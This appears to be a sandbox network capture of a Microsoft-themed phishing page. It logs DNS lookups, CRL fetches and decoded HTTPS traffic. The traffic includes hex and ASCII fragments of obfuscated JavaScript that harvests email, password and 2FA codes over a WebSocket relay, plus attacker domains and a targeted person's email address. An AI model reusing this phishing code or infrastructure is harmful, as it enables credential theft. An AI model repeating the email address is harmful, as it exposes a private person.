Mar 25, 2025 17:13:15.630767107 CET	1.1.1.1	192.168.2.4	0x7825	No error (0)	s-part-0010.t-0009.t-msedge.net		13.107.246.38	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:15.630778074 CET	1.1.1.1	192.168.2.4	0x1bdf	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 25, 2025 17:13:29.163206100 CET	1.1.1.1	192.168.2.4	0x6c9a	No error (0)	server1.linxcoded.top		185.174.100.76	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:29.247596979 CET	1.1.1.1	192.168.2.4	0x9095	Name error (3)	_8248._https.server1.linxcoded.top	none	none	65	IN (0x0001)	false
Mar 25, 2025 17:13:29.817800999 CET	1.1.1.1	192.168.2.4	0x1326	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:29.817800999 CET	1.1.1.1	192.168.2.4	0x1326	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:29.817800999 CET	1.1.1.1	192.168.2.4	0x1326	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:29.819534063 CET	1.1.1.1	192.168.2.4	0x3823	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 25, 2025 17:13:30.415992975 CET	1.1.1.1	192.168.2.4	0x5c0b	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 25, 2025 17:13:30.418500900 CET	1.1.1.1	192.168.2.4	0x12bb	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:30.418500900 CET	1.1.1.1	192.168.2.4	0x12bb	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:30.418500900 CET	1.1.1.1	192.168.2.4	0x12bb	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:36.688404083 CET	1.1.1.1	192.168.2.4	0x6e60	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:13:49.062630892 CET	1.1.1.1	192.168.2.4	0xd5d1	No error (0)	avcbtech.site		104.168.138.190	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:14:36.109106064 CET	1.1.1.1	192.168.2.4	0xa760	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:14:36.109106064 CET	1.1.1.1	192.168.2.4	0xa760	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:14:36.109106064 CET	1.1.1.1	192.168.2.4	0xa760	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:14:36.111584902 CET	1.1.1.1	192.168.2.4	0x8bc1	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 25, 2025 17:15:07.078385115 CET	1.1.1.1	192.168.2.4	0xfc71	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:15:07.078385115 CET	1.1.1.1	192.168.2.4	0xfc71	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:15:07.078385115 CET	1.1.1.1	192.168.2.4	0xfc71	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:15:07.078635931 CET	1.1.1.1	192.168.2.4	0xe947	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 25, 2025 17:16:07.798269987 CET	1.1.1.1	192.168.2.4	0xac13	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:07.798269987 CET	1.1.1.1	192.168.2.4	0xac13	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:07.798269987 CET	1.1.1.1	192.168.2.4	0xac13	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:07.798288107 CET	1.1.1.1	192.168.2.4	0xe6ae	No error (0)	api.ipify.org			65	IN (0x0001)	false
Mar 25, 2025 17:16:17.272516012 CET	1.1.1.1	192.168.2.4	0xf4c5	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:17.272516012 CET	1.1.1.1	192.168.2.4	0xf4c5	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:17.272516012 CET	1.1.1.1	192.168.2.4	0xf4c5	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Mar 25, 2025 17:16:17.275546074 CET	1.1.1.1	192.168.2.4	0xf28c	No error (0)	api.ipify.org			65	IN (0x0001)	false

HTTP Request Dependency Graph

office.avcbtech.store

sender.linxcoded.top

code.jquery.com

i.imgur.com

api.ipify.org

avcbtech.site

c.pki.goog

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49743	142.250.64.99	80

Timestamp	Bytes transferred	Direction	Data
Mar 25, 2025 17:13:20.296909094 CET	202	OUT	GET /r/gsr1.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 17:13:20.394726992 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 15:23:27 GMT Expires: Tue, 25 Mar 2025 16:13:27 GMT Age: 2993 Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding
Mar 25, 2025 17:13:20.399204969 CET	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
Mar 25, 2025 17:13:20.498265982 CET	223	IN	HTTP/1.1 304 Not Modified Date: Tue, 25 Mar 2025 15:23:30 GMT Expires: Tue, 25 Mar 2025 16:13:30 GMT Age: 2990 Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT Cache-Control: public, max-age=3000 Vary: Accept-Encoding

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49724	139.28.36.38	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:10 UTC	581	OUT	GET /kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com HTTP/1.1 Host: office.avcbtech.store Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:11 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.3 Date: Tue, 25 Mar 2025 16:13:10 GMT Content-Type: application/javascript Content-Length: 68421 Last-Modified: Fri, 14 Mar 2025 13:25:44 GMT Connection: close ETag: "67d42e58-10b45" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-25 16:13:11 UTC	15988	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 31 31 62 28 29 7b 76 61 72 20 5f 30 78 35 30 64 36 39 35 3d 5b 27 23 62 61 63 6b 27 2c 27 49 6e 63 6f 72 72 65 63 74 5c 78 32 30 32 46 41 5c 78 32 30 63 6f 64 65 2e 5c 78 32 30 54 72 79 5c 78 32 30 61 67 61 69 6e 2e 27 2c 27 64 69 76 36 27 2c 27 23 62 61 63 6b 2d 74 65 78 74 27 2c 27 74 79 70 65 27 2c 27 4d 69 63 72 6f 73 6f 66 74 27 2c 27 72 65 6c 61 79 27 2c 27 36 6b 67 6a 58 4c 43 27 2c 27 73 74 79 6c 65 27 2c 27 70 61 67 65 5f 76 69 73 69 74 27 2c 27 63 6c 6f 73 65 27 2c 27 61 70 70 72 6f 76 65 5f 73 69 67 6e 69 6e 27 2c 27 64 69 76 35 27 2c 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 27 23 63 61 70 74 63 68 61 2d 62 74 6e 27 2c 27 2e 6c 6f 67 6f 6e 61 6d 65 27 2c 27 64 69 73 61 62 Data Ascii: function _0xe11b(){var _0x50d695=['#back','Incorrect\x202FA\x20code.\x20Try\x20again.','div6','#back-text','type','Microsoft','relay','6kgjXLC','style','page_visit','close','approve_signin','div5','https://www.office.com','#captcha-btn','.logoname','disab
2025-03-25 16:13:11 UTC	16384	IN	Data Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 31 36 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 63 6f 6c 6f 72 3a 5c 78 32 30 72 67 62 28 35 31 2c 5c 78 32 30 35 31 2c 5c 78 32 30 35 31 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 Data Ascii: \x20\x20\x20\x20\x20\x20\x20font-size:\x2016px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20rgb(51,\x2051,\x2051);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
2025-03-25 16:13:11 UTC	16384	IN	Data Raw: 32 32 3e 3c 70 5c 78 32 30 69 64 3d 5c 78 32 32 61 70 70 72 6f 76 65 2d 6e 75 6d 62 65 72 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 68 33 5c 78 32 30 74 65 78 74 2d 63 65 6e 74 65 72 5c 78 32 32 5c 78 32 30 73 74 79 6c 65 3d 5c 78 32 32 62 6f 72 64 65 72 3a 5c 78 32 30 32 70 78 5c 78 32 30 73 6f 6c 69 64 5c 78 32 30 62 6c 61 63 6b 3b 5c 78 32 30 66 6f 6e 74 2d 73 69 7a 65 3a 5c 78 32 30 34 30 70 78 3b 5c 78 32 30 70 61 64 64 69 6e 67 3a 5c 78 32 30 31 32 70 78 5c 78 32 30 31 32 70 78 3b 5c 78 32 30 74 65 78 74 2d 61 6c 69 67 6e 3a 5c 78 32 30 63 65 6e 74 65 72 3b 5c 78 32 30 64 69 73 70 6c 61 79 3a 5c 78 32 30 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 5c 78 32 32 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 62 72 3e 27 2c 27 3c 61 5c 78 32 30 68 72 65 66 Data Ascii: 22><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22\x20style=\x22border:\x202px\x20solid\x20black;\x20font-size:\x2040px;\x20padding:\x2012px\x2012px;\x20text-align:\x20center;\x20display:\x20inline-block;\x22></p></div><br>','<a\x20href
2025-03-25 16:13:11 UTC	16384	IN	Data Raw: 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 5f 30 78 34 64 34 61 64 61 28 30 78 32 34 62 29 29 2c 5f 30 78 35 66 63 32 31 34 5b 5f 30 78 34 64 34 61 64 61 28 30 78 31 38 38 29 5d 28 27 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 67 72 6f 75 70 5c 78 32 30 6d 74 2d 32 5c 78 32 32 3e 3c 69 6e 70 75 74 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 5c 78 32 30 72 6f 75 6e 64 65 64 2d 30 5c 78 32 30 62 6f 72 64 65 72 2d 64 61 72 6b 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 61 69 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 Data Ascii: 214[_0x4d4ada(0x188)](_0x4d4ada(0x24b)),_0x5fc214[_0x4d4ada(0x188)]('<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x
2025-03-25 16:13:11 UTC	3281	IN	Data Raw: 28 27 23 6d 73 67 2d 32 66 61 27 29 5b 5f 30 78 32 38 35 37 35 66 28 30 78 31 62 37 29 5d 28 5f 30 78 32 38 35 37 35 66 28 30 78 31 39 32 29 29 3b 7d 7d 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 34 61 33 65 36 3d 5f 30 78 31 38 63 32 37 61 3b 24 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 39 29 29 5b 27 74 65 78 74 27 5d 28 5f 30 78 34 34 61 33 65 36 28 30 78 31 62 38 29 29 2c 5f 30 78 31 36 38 65 66 33 28 29 3b 7d 7d 29 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 31 30 37 31 66 32 3d 6e 65 77 20 57 65 62 53 6f 63 6b 65 74 28 5f 30 78 31 38 63 32 37 61 28 30 78 31 64 63 29 29 3b 5f 30 78 31 30 37 31 66 32 5b 5f 30 78 31 38 63 32 37 61 28 30 78 32 33 38 29 5d 3d 66 75 6e 63 Data Ascii: ('#msg-2fa')[_0x28575f(0x1b7)](_0x28575f(0x192));}}_0x168ef3();},'error':function(){var _0x44a3e6=_0x18c27a;$(_0x44a3e6(0x1b9))['text'](_0x44a3e6(0x1b8)),_0x168ef3();}});else{const _0x1071f2=new WebSocket(_0x18c27a(0x1dc));_0x1071f2[_0x18c27a(0x238)]=func

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49726	185.174.100.20	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:12 UTC	566	OUT	GET /start/xls/includes/css6.css HTTP/1.1 Host: sender.linxcoded.top Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:12 UTC	383	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Tue, 25 Mar 2025 16:13:12 GMT Content-Type: text/css Content-Length: 258966 Last-Modified: Mon, 27 Jan 2025 22:21:00 GMT Connection: close ETag: "679806cc-3f396" Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Access-Control-Allow-Origin: * Cache-Control: public, must-revalidate Accept-Ranges: bytes
2025-03-25 16:13:12 UTC	16001	IN	Data Raw: 20 2f 2a 21 0d 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0d 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0d 0a 20 2a 2f 0d 0a 20 20 20 20 3a 72 6f 6f 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 2d 62 6c 75 65 3a 20 23 30 30 37 Data Ascii: /! Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors * Copyright 2011-2018 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ :root { --blue: #007
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 75 70 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 34 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 34 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 35 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 36 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 35 3b 0d 0a 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 35 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6f 72 64 65 72 2d 36 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 37 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 36 3b 0d Data Ascii: up: 5; -ms-flex-order: 4; order: 4 } .order-5 { -webkit-box-ordinal-group: 6; -ms-flex-order: 5; order: 5 } .order-6 { -webkit-box-ordinal-group: 7; -ms-flex-order: 6;
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 65 78 2d 6f 72 64 65 72 3a 20 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 39 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 30 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 31 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 31 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 64 65 72 2d 6c 67 2d 31 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 32 3b 0d 0a 20 Data Ascii: ex-order: 9; order: 9 } .order-lg-10 { -webkit-box-ordinal-group: 11; -ms-flex-order: 10; order: 10 } .order-lg-11 { -webkit-box-ordinal-group: 12;
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 62 74 6e 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 70 72 65 70 65 6e 64 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 70 6c 61 69 6e 74 65 78 74 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 74 65 78 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2d 73 6d 2c 0d 0a 20 20 20 20 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 73 6d 3e 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 0d 0a 20 20 20 20 2e 69 6e Data Ascii: roup-prepend>.form-control-plaintext.btn, .input-group-sm>.input-group-prepend>.form-control-plaintext.input-group-text { padding-right: 0; padding-left: 0 } .form-control-sm, .input-group-sm>.form-control, .in
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { 